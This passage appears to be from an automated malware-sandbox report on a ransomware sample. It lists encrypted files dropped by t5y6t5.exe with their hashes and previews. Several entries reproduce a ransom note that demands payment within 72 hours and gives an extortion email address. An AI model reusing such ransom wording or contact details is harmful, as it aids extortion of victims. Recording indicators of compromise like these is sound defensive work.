                                                                                            Preview:...1.=.E-.oE.7.s3.....[....1. r.X$[:q.0..`.zk=.[FN.e.;Bj>~.E>4..(nk.a.a.qKh....c..'+.j2._.....60!.)..9......b...*.8t...|.#%. ....j....h.Rq......_......U..vMZ...M..g.n .....E..,.%oA..m.....IS.~..p.'...{.^.-....\&.6..sY51.G...1s....K....{.........6p.E.'.4..f..(.:.K...../.O%..........4S.h...IxS....9...........}R..R.+.....z".A.......C.h......zK......)............c.Q.`....+.P.Y.:../...3\.R.{...0a..dJ.\q.._.[...5....d...{.k.#....j.lm,i]}.!......u.\..iUQ.....xs..D....=..%.......c7.:.b"..f.6.....s...UQ.)A...;6...x.wq....Guku.p.!.j._O.p0NT8.4......c.4...*..J......k.v.....='7.....gTG.....j..v.../.....2.........lP..z.Kr...DSM....O..HO.v..uD.F}.#.H..9]@....G..M..8.)a.s..5.a=R.Za....7.&....X.;.....K..w..jR...=.v.......5....d..Fu.mZ..*I..E.j#..-w.h.^.uT..T....4lE......z.p.thjC.".L.....p...rZ.....qn.].6..V....ST.......f.........\..........U.I|8?.Fm..]{TL...._.T.d...W.....w...j..ml].|Nd6nRp.<gQ...O....?*....f.[...k.../.?..(.......K......l....j....,D..4...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.884088330708015
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:wANEr+6RusqVjjt+bv401Dt3k5pUfxBeyejBC17uZjEfvuHuV6TgzYGJ/4j:wANEK4wVjQv40Nt3k5piBets7uZY+um1
                                                                                            MD5:21683C427EDDE29A4BBF7BA11AD00D25
                                                                                            SHA1:53CEA54C3DCBFA69251DA6F8C3DE31D892733D82
                                                                                            SHA-256:A84CA614832D91BC3BBB4291605F25BE32A287BC0519B1FC5555380F5614A46E
                                                                                            SHA-512:77AE4E1762D7986EE535E5BC65421F3DDA7F0826FB5EE3C82CBDE41B66BD3AC559CF5323B98583A085E4904FBECAE1A19B822D2461F4D1F547F7EC48AB8529CA
                                                                                            Malicious:false
                                                                                            Preview:...1.=.E-.oE.7.s3.....[....1. r.X$[:q.0..`.zk=.[FN.e.;Bj>~.E>4..(nk.a.a.qKh....c..'+.j2._.....60!.)..9......b...*.8t...|.#%. ....j....h.Rq......_......U..vMZ...M..g.n .....E..,.%oA..m.....IS.~..p.'...{.^.-....\&.6..sY51.G...1s....K....{.........6p.E.'.4..f..(.:.K...../.O%..........4S.h...IxS....9...........}R..R.+.....z".A.......C.h......zK......)............c.Q.`....+.P.Y.:../...3\.R.{...0a..dJ.\q.._.[...5....d...{.k.#....j.lm,i]}.!......u.\..iUQ.....xs..D....=..%.......c7.:.b"..f.6.....s...UQ.)A...;6...x.wq....Guku.p.!.j._O.p0NT8.4......c.4...*..J......k.v.....='7.....gTG.....j..v.../.....2.........lP..z.Kr...DSM....O..HO.v..uD.F}.#.H..9]@....G..M..8.)a.s..5.a=R.Za....7.&....X.;.....K..w..jR...=.v.......5....d..Fu.mZ..*I..E.j#..-w.h.^.uT..T....4lE......z.p.thjC.".L.....p...rZ.....qn.].6..V....ST.......f.........\..........U.I|8?.Fm..]{TL...._.T.d...W.....w...j..ml].|Nd6nRp.<gQ...O....?*....f.[...k.../.?..(.......K......l....j....,D..4...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.829235981109879
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GWIGsy/NygDSsGqHGX+5OeVj9icB1AsPVa+aoqISRS9iMly2Hvy7m:BIG/FoY8eVj9LafISRwvFHvy7m
                                                                                            MD5:98EE1C876793DAE5011AB5E0DDF3F4D3
                                                                                            SHA1:FA9B685CB57C50E9B54309340C71F5130418A801
                                                                                            SHA-256:CE23976B2BFFD3D41B21E57E6B20179130DB087808CF6D0976D3C2EEA79F21E8
                                                                                            SHA-512:B970EC5D932F0CD0233BA8530D6DCC806E5165945D7EB3F0A842D40CBB1EF84E4D3607CEEA399B32BF411CAC238FA1E065F4633B73DCABE1614B79EE6C60AAF6
                                                                                            Malicious:false
                                                                                            Preview:...R.fr.W.Cs\...oh......t...a..F.CF....|.Mr...Y.....?..B/...G....=*..........].t.uc.-...W(./(..`|..^....T.[/.I.V...4.ZF..kl.....-.LQ!......6...O..1.......U.A..m..7?..%W.X..W..m.x.<<.%o...z...-.r.....:.....\...j..:-..a....; 0yg...S.....bIi.e.....$.Z..(._.j:..8A{.bV.Q..b.....L....O.!.x..^z.h. ]..b@..,7&........i..0...uKu..u...8k..kj*.&hj.......uk.d.s.....i.xV.E..#..........9B....=.tn.6.g.#.]'u..4....n.".@/....i.1....'.)..i....C%..(f.@_...M..e.......p.......(...9....zf.Q..UW.U...."T{........gB...7.H...n;/.P.\...$..N.,,...Q\.K;oe.K..9..b.=.....'.........W..r0.C=.`1.2........8..fx.+g..S........- ...b..\7.......i^~...L>|tD..6.A_.a..6)..d.p~T.X..A%;..jH3.....W.....$..KA....,...?.6..$C)5......ZQTO.=.?Y.+S.(E.3>z.Cy.w.q.k.=#.;9..J.0H.E............`.w.2ZM...$...?.......p.....zv...G..V.%...Xv.....wV..kb.P...E...h$y..C.<.K....B.-..7...O...r2.T....\4.&...Z...}7...%.x.6...h.4i.%Dw9S.............m.w....Jz...9j.6....gG ....u.....%.~68....['N.4......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.829235981109879
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GWIGsy/NygDSsGqHGX+5OeVj9icB1AsPVa+aoqISRS9iMly2Hvy7m:BIG/FoY8eVj9LafISRwvFHvy7m
                                                                                            MD5:98EE1C876793DAE5011AB5E0DDF3F4D3
                                                                                            SHA1:FA9B685CB57C50E9B54309340C71F5130418A801
                                                                                            SHA-256:CE23976B2BFFD3D41B21E57E6B20179130DB087808CF6D0976D3C2EEA79F21E8
                                                                                            SHA-512:B970EC5D932F0CD0233BA8530D6DCC806E5165945D7EB3F0A842D40CBB1EF84E4D3607CEEA399B32BF411CAC238FA1E065F4633B73DCABE1614B79EE6C60AAF6
                                                                                            Malicious:false
                                                                                            Preview:...R.fr.W.Cs\...oh......t...a..F.CF....|.Mr...Y.....?..B/...G....=*..........].t.uc.-...W(./(..`|..^....T.[/.I.V...4.ZF..kl.....-.LQ!......6...O..1.......U.A..m..7?..%W.X..W..m.x.<<.%o...z...-.r.....:.....\...j..:-..a....; 0yg...S.....bIi.e.....$.Z..(._.j:..8A{.bV.Q..b.....L....O.!.x..^z.h. ]..b@..,7&........i..0...uKu..u...8k..kj*.&hj.......uk.d.s.....i.xV.E..#..........9B....=.tn.6.g.#.]'u..4....n.".@/....i.1....'.)..i....C%..(f.@_...M..e.......p.......(...9....zf.Q..UW.U...."T{........gB...7.H...n;/.P.\...$..N.,,...Q\.K;oe.K..9..b.=.....'.........W..r0.C=.`1.2........8..fx.+g..S........- ...b..\7.......i^~...L>|tD..6.A_.a..6)..d.p~T.X..A%;..jH3.....W.....$..KA....,...?.6..$C)5......ZQTO.=.?Y.+S.(E.3>z.Cy.w.q.k.=#.;9..J.0H.E............`.w.2ZM...$...?.......p.....zv...G..V.%...Xv.....wV..kb.P...E...h$y..C.<.K....B.-..7...O...r2.T....\4.&...Z...}7...%.x.6...h.4i.%Dw9S.............m.w....Jz...9j.6....gG ....u.....%.~68....['N.4......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.853980018175447
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:C99ug4cHgDss3n+PlnDIGKbXHoE3Ly56iWL1DpWyb/q4Fp2:y98cHgDj3n+dDGYmpiK1FWyb/q4Fp2
                                                                                            MD5:20C6735A7CE6D0B9BFEEEA558655E9F7
                                                                                            SHA1:318BEECFDE97B4FFB97B7BAF844EC49190D4AB5D
                                                                                            SHA-256:62CA7E0F5B8E55A31E0E7A955A3A43D2863CB26665D1F40988BF6B617E5A3E93
                                                                                            SHA-512:25E7D2108FFF0B50C1B7D89DB45577CB636BF8870988A482E00AF412C676F1923E6331BF23DDB84E7549CEAE7848BFB39B0D2851CA2638E1C38F0D7275ADB066
                                                                                            Malicious:false
                                                                                            Preview:p...5HuTM...0..*.+9=..RMw,.."BJ..........D./B....$...K.. ...jJk'.~9.Cu/..s..k7.>.e..6.........`t:...G..@.....?U0.-..\....>#.....p.`e.>kM."....c...-Z.>...$..q..6[.;.`.....I.q...B..F.G..4...k.....#+..tz.~..#.R_............&............n;.P.T~?..+...Bd.\...X.||.L.xk....m..w...rY'......}.F...$z;d_Q.$......sn8I..3z..>.F.~..3.7V"B7......M.PD...y...4.5..lE.....>N.......g.U%....[....R.....Dp.0...#i./...]@K..}...W. ....mQ.l..I...B\..... .@..w5k#u'..^.I.t.Q.w...7..........x.f4~.!.p4..[..=...Y...Oh.[H.\!j.....t.'.[....P!...3.....J5.....b...%..@...M...^..#.3d....U.~Ow4:?.@Y.g.A.G=..q]......w..7..T9Yy.I...)../"....l[(n..k.....;#{......H.(.".O..rz..!E...\...q..q3.*%..(....Ez..9H.D.+K?.)..xl...1...v....C.J.^..@............~..A.,muA.`..RMm......n.x...0.u.q. L.0.pXRyV.4Oe.b..=.-.....d.].U.|..~X......O...b.....h./.\uW..;v.Q[..Z....-=?$....*.P..[~h.....*....}-zlkM<.&.Vs...n....1Ck.;..{........QB.'T.(.. ...G...U...CP.f.i.d.h.*.e..?..b'.t.8..`S...+)...O
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.853980018175447
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:C99ug4cHgDss3n+PlnDIGKbXHoE3Ly56iWL1DpWyb/q4Fp2:y98cHgDj3n+dDGYmpiK1FWyb/q4Fp2
                                                                                            MD5:20C6735A7CE6D0B9BFEEEA558655E9F7
                                                                                            SHA1:318BEECFDE97B4FFB97B7BAF844EC49190D4AB5D
                                                                                            SHA-256:62CA7E0F5B8E55A31E0E7A955A3A43D2863CB26665D1F40988BF6B617E5A3E93
                                                                                            SHA-512:25E7D2108FFF0B50C1B7D89DB45577CB636BF8870988A482E00AF412C676F1923E6331BF23DDB84E7549CEAE7848BFB39B0D2851CA2638E1C38F0D7275ADB066
                                                                                            Malicious:false
                                                                                            Preview:p...5HuTM...0..*.+9=..RMw,.."BJ..........D./B....$...K.. ...jJk'.~9.Cu/..s..k7.>.e..6.........`t:...G..@.....?U0.-..\....>#.....p.`e.>kM."....c...-Z.>...$..q..6[.;.`.....I.q...B..F.G..4...k.....#+..tz.~..#.R_............&............n;.P.T~?..+...Bd.\...X.||.L.xk....m..w...rY'......}.F...$z;d_Q.$......sn8I..3z..>.F.~..3.7V"B7......M.PD...y...4.5..lE.....>N.......g.U%....[....R.....Dp.0...#i./...]@K..}...W. ....mQ.l..I...B\..... .@..w5k#u'..^.I.t.Q.w...7..........x.f4~.!.p4..[..=...Y...Oh.[H.\!j.....t.'.[....P!...3.....J5.....b...%..@...M...^..#.3d....U.~Ow4:?.@Y.g.A.G=..q]......w..7..T9Yy.I...)../"....l[(n..k.....;#{......H.(.".O..rz..!E...\...q..q3.*%..(....Ez..9H.D.+K?.)..xl...1...v....C.J.^..@............~..A.,muA.`..RMm......n.x...0.u.q. L.0.pXRyV.4Oe.b..=.-.....d.].U.|..~X......O...b.....h./.\uW..;v.Q[..Z....-=?$....*.P..[~h.....*....}-zlkM<.&.Vs...n....1Ck.;..{........QB.'T.(.. ...G...U...CP.f.i.d.h.*.e..?..b'.t.8..`S...+)...O
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.85234475683802
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:mq1W6Y+laoncUbToN+6LCw1keIhaLMDRHp0n7p2UcMWPo9YoXor:Xczl2bToNp91kKLG0nRJ7or
                                                                                            MD5:2FBE9E87F21EBA5506589228070145C4
                                                                                            SHA1:6CC1BDB1CFE03FBB9F041E569E485729AA7B1642
                                                                                            SHA-256:0D2C5685F9010CFAD8182127FD16C96B70E2BB366F2A7F3BFBA0587E23ACBE8E
                                                                                            SHA-512:47D53B18C1ACB85C57C333DCF9F2D910A111FCDF90A280D14C99179C6055B47A58DF02A3F5799CB7B5E1A1518CB2EE663F09D0CAB3B9DA2C8B1B5DC990A32D3F
                                                                                            Malicious:false
                                                                                            Preview:%.j.?N...g*Q.AT.i.1.Z.....h'0~Nn.+!....+H"zd..Y.]^k..aZ/..u.w.f.....h.F3..P..R.....S,.z.T....>.3...E....Q.B.i.4..C_B.,(..._.......BfX!d.]..E`{..>..Lt#...Kj. ..0w.T.?..I.l..uN...>.r.,......$.K.}T...@....O.f"!.P<n.P.?...X.la..w~..E.wV+.9.S..r..P./.f[.....C...}dd.=~.....V.R..5..j..N....Y.t..4.....k."....^Q:..xM8..~P....4....A.uT'...:4.b..c%.dD.....w...%u...>.........c..c..M..e......|.fI}V......FpX....ik......t..%A....(.!LDR.{.G..O.Y.N.2x_uD.V[!...o..h.R.@....l(\...@.e.I.kN....`0...F[i..r$s..&........8sK.qF...;2w..u.b..'(5....k|%..5.._(...~.....1.....(.".d.`..=.9/.B.'g.1.).4..p(.....~T),x....8+..pkQ.G..FE._`P.Qo(..F.=I....R..8u..h..gsH... .k..55.8...}.56.Z....*.....,&......j...WW6.).I...8.r...(.'?w...^.$.=.C<.k..$'.$ .Y1.h.....xW. +.v$.KR...M)j...,.G.8;P.l..rz...tD.7..][..<...1Sz..d.....K......{..`}.~.6.B.nC..^LU9.....h3_).$r.B..WQ..{...w..j..%%2.7.(....T..F.4...?d.|.?.3.Q..;i..%....`~bP...q.b(....._%.'...qU.....N....4U=E...c=2.,.$.\6.GiE..D
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.85234475683802
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:mq1W6Y+laoncUbToN+6LCw1keIhaLMDRHp0n7p2UcMWPo9YoXor:Xczl2bToNp91kKLG0nRJ7or
                                                                                            MD5:2FBE9E87F21EBA5506589228070145C4
                                                                                            SHA1:6CC1BDB1CFE03FBB9F041E569E485729AA7B1642
                                                                                            SHA-256:0D2C5685F9010CFAD8182127FD16C96B70E2BB366F2A7F3BFBA0587E23ACBE8E
                                                                                            SHA-512:47D53B18C1ACB85C57C333DCF9F2D910A111FCDF90A280D14C99179C6055B47A58DF02A3F5799CB7B5E1A1518CB2EE663F09D0CAB3B9DA2C8B1B5DC990A32D3F
                                                                                            Malicious:false
                                                                                            Preview:%.j.?N...g*Q.AT.i.1.Z.....h'0~Nn.+!....+H"zd..Y.]^k..aZ/..u.w.f.....h.F3..P..R.....S,.z.T....>.3...E....Q.B.i.4..C_B.,(..._.......BfX!d.]..E`{..>..Lt#...Kj. ..0w.T.?..I.l..uN...>.r.,......$.K.}T...@....O.f"!.P<n.P.?...X.la..w~..E.wV+.9.S..r..P./.f[.....C...}dd.=~.....V.R..5..j..N....Y.t..4.....k."....^Q:..xM8..~P....4....A.uT'...:4.b..c%.dD.....w...%u...>.........c..c..M..e......|.fI}V......FpX....ik......t..%A....(.!LDR.{.G..O.Y.N.2x_uD.V[!...o..h.R.@....l(\...@.e.I.kN....`0...F[i..r$s..&........8sK.qF...;2w..u.b..'(5....k|%..5.._(...~.....1.....(.".d.`..=.9/.B.'g.1.).4..p(.....~T),x....8+..pkQ.G..FE._`P.Qo(..F.=I....R..8u..h..gsH... .k..55.8...}.56.Z....*.....,&......j...WW6.).I...8.r...(.'?w...^.$.=.C<.k..$'.$ .Y1.h.....xW. +.v$.KR...M)j...,.G.8;P.l..rz...tD.7..][..<...1Sz..d.....K......{..`}.~.6.B.nC..^LU9.....h3_).$r.B..WQ..{...w..j..%%2.7.(....T..F.4...?d.|.?.3.Q..;i..%....`~bP...q.b(....._%.'...qU.....N....4U=E...c=2.,.$.\6.GiE..D
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855628222377076
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:w6GnR4m1C/8wr4vySIdWL0+i1yGegw2Cp646gCBek0KFAkNd87XW5S:G2/8wr4CUr1Ft640C6dZ5S
                                                                                            MD5:66EC532AAFFA945F28CFFDF835F06DA1
                                                                                            SHA1:C2CD89412D5CBE3C20F77DC61B2F901B7FD32DEF
                                                                                            SHA-256:056E2AD1923794C9CD62D42788B8C9F600713907F66154C9E04A4A3EB3B6FA71
                                                                                            SHA-512:46975A4504CD38B4A3178C051C7373178FF0DE1CC19F653E8677D8D879D3915080A70D5A2D84E47F67B6CA9BB4E2D96C424DCE500C1B60D35DB807904137FCBD
                                                                                            Malicious:false
                                                                                            Preview:S......~s.XK.jT...Q..".8..Z.k/.$.5.B.........j.t.R........ki..:F<.....`....`Z.U="p.....]...~.)t.........G.$.XV.....,.X..SV..].....(...kQ..b..Z#...9.-.a...qB.g...T0......,.mc..In...,....;.ny.N.U..'.,....W,..?..-w..].....-.....y.-...J.........v..2....6...?:...........i|.....Vcw.-?.Ie.E.#J4=N&?i..8=....r...."...UG..9..e.V...../..e$..}2.w."...0...v^.....*5.....9.A...-.I3.....O@......[......k&53......"...4..L9....m..c........M.P.W.......k..v....B..b.....Z..b.`a.pL..h\[....\.Y...=.@..no"..s..^..~X...LEk.aZ..H.(%.Pm....>...k..m..2...7..S.oW..L.. 7.a.pr.....M...:..K..W...j.....G..e.h.........w...[.?.).4wT.....Vv.<M7H:?#..u..b.lG.rxI......z`.T...wis8.........rJ.....#.......{.-..1....+m$..........9'.bH.C<.1bL.Mx.O.pk..D..;Lw+\...Sc&.......T.&... .R...Z.+/..O..O...RD....ps..jrH......L.7...!...?...<t>..W...J...Ik \.[=bh...P...E.<.A.+{.....?..SR.."...l1...o.p... ......Vo.T.V...c7..y..LW%.......l....E.?.z.;R.z...@.$.T.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855628222377076
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:w6GnR4m1C/8wr4vySIdWL0+i1yGegw2Cp646gCBek0KFAkNd87XW5S:G2/8wr4CUr1Ft640C6dZ5S
                                                                                            MD5:66EC532AAFFA945F28CFFDF835F06DA1
                                                                                            SHA1:C2CD89412D5CBE3C20F77DC61B2F901B7FD32DEF
                                                                                            SHA-256:056E2AD1923794C9CD62D42788B8C9F600713907F66154C9E04A4A3EB3B6FA71
                                                                                            SHA-512:46975A4504CD38B4A3178C051C7373178FF0DE1CC19F653E8677D8D879D3915080A70D5A2D84E47F67B6CA9BB4E2D96C424DCE500C1B60D35DB807904137FCBD
                                                                                            Malicious:false
                                                                                            Preview:S......~s.XK.jT...Q..".8..Z.k/.$.5.B.........j.t.R........ki..:F<.....`....`Z.U="p.....]...~.)t.........G.$.XV.....,.X..SV..].....(...kQ..b..Z#...9.-.a...qB.g...T0......,.mc..In...,....;.ny.N.U..'.,....W,..?..-w..].....-.....y.-...J.........v..2....6...?:...........i|.....Vcw.-?.Ie.E.#J4=N&?i..8=....r...."...UG..9..e.V...../..e$..}2.w."...0...v^.....*5.....9.A...-.I3.....O@......[......k&53......"...4..L9....m..c........M.P.W.......k..v....B..b.....Z..b.`a.pL..h\[....\.Y...=.@..no"..s..^..~X...LEk.aZ..H.(%.Pm....>...k..m..2...7..S.oW..L.. 7.a.pr.....M...:..K..W...j.....G..e.h.........w...[.?.).4wT.....Vv.<M7H:?#..u..b.lG.rxI......z`.T...wis8.........rJ.....#.......{.-..1....+m$..........9'.bH.C<.1bL.Mx.O.pk..D..;Lw+\...Sc&.......T.&... .R...Z.+/..O..O...RD....ps..jrH......L.7...!...?...<t>..W...J...Ik \.[=bh...P...E.<.A.+{.....?..SR.."...l1...o.p... ......Vo.T.V...c7..y..LW%.......l....E.?.z.;R.z...@.$.T.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.84681998551165
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TT2KXvEbggCWPRwBPN53k+qjpOgwIA+ZuuJFiTJqb4wA5njmABhg:TdX8ggL6xN2MIAaFoTm4wA5nXBhg
                                                                                            MD5:B1FBDA1914C1A366ACD691733B550EAD
                                                                                            SHA1:DFF1C4D954BBB45BEFE38340278722E95EB6BA90
                                                                                            SHA-256:18497F840FE8CA6E0EA3947164F1463E80C1BED1C3AADD413B4C2914EB886F23
                                                                                            SHA-512:DBFED5DBD1CC92151ABAD3EC9E94AC7B008F89AC46142EC5C5DA92B0A57E2E2231B4C63A912585D6DD2E45EE5D5356ECB99AEF55F6A2F45BD311AEC601283819
                                                                                            Malicious:false
                                                                                            Preview:...o..>..7.C.k..k..G!2..x."...#Wmuo.[*.q?|IY.$.....rF....D..B0.0...g.^.d......J.G.W1f-....@.J../.t.w..$.x..D3..._.x.7.'W.E.....b.G.L%..8.X....<.l8........z_.W.@.!.[.j1.w|2..M.RC.$...,...O..@.......E]B...9..Sp...h..w.Z24.5....rK[uY.%dg.sc[...<..Z8..M......z!.:Zt......\.h.AK-.....5...S.m......8;.........@..8.F..D.h.j..&..o....<jT..'+.~....$.HL...'6...V.[.B..H.Sc.....R..cX|...cr,U{B..6........./..f.-1.$x{.j'.o8.*.2..eU....q:..iv]..}...W..&UK.f..V.F%..~l.$...?o..nQ..Wfx;g.p.s.*S..}..............V..2l...mO...O..8-....tb?..M~......G.<f>e.\..F.Y:.u....A^.-..o.].N?./J.......R.8..!.wu".ag...cp....H'.GZ......_....<=}..._O..c...O...i..9..+{ vJ2........i.<q..~Nq..W.......5....Kw'w..q.T5.'..;.o/8..]G....a....@f..V.?.R.^....d......VdD^.s....iz..l.$....'.aO.......,j.s..Q....H.....D=....X.Vn.I:...T...0z...8.....b...I./.*.#+5..6..l...%.n)b.XKZ.%.P2(yg.........)......8/..p..2p...b.....B.[Z.....*....D2...#.9.....m.0..mj.;...U.d...r..$.g...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.84681998551165
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TT2KXvEbggCWPRwBPN53k+qjpOgwIA+ZuuJFiTJqb4wA5njmABhg:TdX8ggL6xN2MIAaFoTm4wA5nXBhg
                                                                                            MD5:B1FBDA1914C1A366ACD691733B550EAD
                                                                                            SHA1:DFF1C4D954BBB45BEFE38340278722E95EB6BA90
                                                                                            SHA-256:18497F840FE8CA6E0EA3947164F1463E80C1BED1C3AADD413B4C2914EB886F23
                                                                                            SHA-512:DBFED5DBD1CC92151ABAD3EC9E94AC7B008F89AC46142EC5C5DA92B0A57E2E2231B4C63A912585D6DD2E45EE5D5356ECB99AEF55F6A2F45BD311AEC601283819
                                                                                            Malicious:false
                                                                                            Preview:...o..>..7.C.k..k..G!2..x."...#Wmuo.[*.q?|IY.$.....rF....D..B0.0...g.^.d......J.G.W1f-....@.J../.t.w..$.x..D3..._.x.7.'W.E.....b.G.L%..8.X....<.l8........z_.W.@.!.[.j1.w|2..M.RC.$...,...O..@.......E]B...9..Sp...h..w.Z24.5....rK[uY.%dg.sc[...<..Z8..M......z!.:Zt......\.h.AK-.....5...S.m......8;.........@..8.F..D.h.j..&..o....<jT..'+.~....$.HL...'6...V.[.B..H.Sc.....R..cX|...cr,U{B..6........./..f.-1.$x{.j'.o8.*.2..eU....q:..iv]..}...W..&UK.f..V.F%..~l.$...?o..nQ..Wfx;g.p.s.*S..}..............V..2l...mO...O..8-....tb?..M~......G.<f>e.\..F.Y:.u....A^.-..o.].N?./J.......R.8..!.wu".ag...cp....H'.GZ......_....<=}..._O..c...O...i..9..+{ vJ2........i.<q..~Nq..W.......5....Kw'w..q.T5.'..;.o/8..]G....a....@f..V.?.R.^....d......VdD^.s....iz..l.$....'.aO.......,j.s..Q....H.....D=....X.Vn.I:...T...0z...8.....b...I./.*.#+5..6..l...%.n)b.XKZ.%.P2(yg.........)......8/..p..2p...b.....B.[Z.....*....D2...#.9.....m.0..mj.;...U.d...r..$.g...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
